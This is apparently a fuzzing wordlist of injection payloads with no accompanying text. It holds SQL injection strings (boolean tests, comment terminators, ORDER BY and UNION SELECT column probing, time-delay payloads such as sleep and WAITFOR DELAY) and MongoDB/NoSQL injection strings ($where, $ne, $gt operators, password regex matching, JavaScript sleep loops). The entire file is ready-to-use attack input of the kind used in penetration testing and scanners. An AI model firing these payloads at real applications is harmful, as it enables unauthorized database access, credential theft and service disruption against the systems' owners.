AND 1=0 --
AND 1=1 --
' AND 1=0 --
' AND 1=1 --
" AND 1=0 --
" AND 1=1 --
' OR 1='1
' OR 1='0
--
-- -;
-- -
#
;
;#
/*
'
"
a"
a'
test
user"
user'
user
%28select(*)from(select(sleep(8640)))shahmidoe%29--%20-%3B
6%252Bdays%252Belapsed,%3BWAITFOR%20DELAY%20%27144:00:00%27--%20-
test" 
test' 
test;
test';
test";
test'#
test"#
test'--
Pets' ORDER BY 1#
Pets' ORDER BY 2#
Pets' ORDER BY 3#
Pets' ORDER BY 4#
Pets' ORDER BY 5#
Pets' ORDER BY 6#
Pets' ORDER BY 1;#
Pets' ORDER BY 2;#
Pets' ORDER BY 3;#
Pets' ORDER BY 4;#
Pets' ORDER BY 5;#
Pets' ORDER BY 6;#
Pets' ORDER BY 1--
Pets' ORDER BY 2--
Pets' ORDER BY 3--
Pets' ORDER BY 4--
Pets' ORDER BY 5--
Pets' ORDER BY 6--
Pets' ORDER BY 1;--
Pets' ORDER BY 2;--
Pets' ORDER BY 3;--
Pets' ORDER BY 4;--
Pets' ORDER BY 5;--
Pets' ORDER BY 6;--
Pets' UNION SELECT NULL#
Pets' UNION SELECT NULL,NULL#
Pets' UNION SELECT NULL,NULL,NULL#
Pets' UNION SELECT NULL,NULL,NULL,NULL#
Pets' UNION SELECT NULL,NULL,NULL,NULL,NULL#
Pets' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL#
Pets' UNION SELECT NULL--
Pets' UNION SELECT NULL,NULL--
Pets' UNION SELECT NULL,NULL,NULL--
Pets' UNION SELECT NULL,NULL,NULL,NULL--
Pets' UNION SELECT NULL,NULL,NULL,NULL,NULL--
Pets' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
Pets' UNION SELECT NULL;#
Pets' UNION SELECT NULL,NULL;#
Pets' UNION SELECT NULL,NULL,NULL;#
Pets' UNION SELECT NULL,NULL,NULL,NULL;#
Pets' UNION SELECT NULL,NULL,NULL,NULL,NULL;#
Pets' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;#
Pets' UNION SELECT NULL;--
Pets' UNION SELECT NULL,NULL;--
Pets' UNION SELECT NULL,NULL,NULL;--
Pets' UNION SELECT NULL,NULL,NULL,NULL;--
Pets' UNION SELECT NULL,NULL,NULL,NULL,NULL;--
Pets' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL;--
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
{"$gt": ""}
[$ne]=1
';sleep(5000);
';sleep(5000);'
';sleep(5000);+'
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true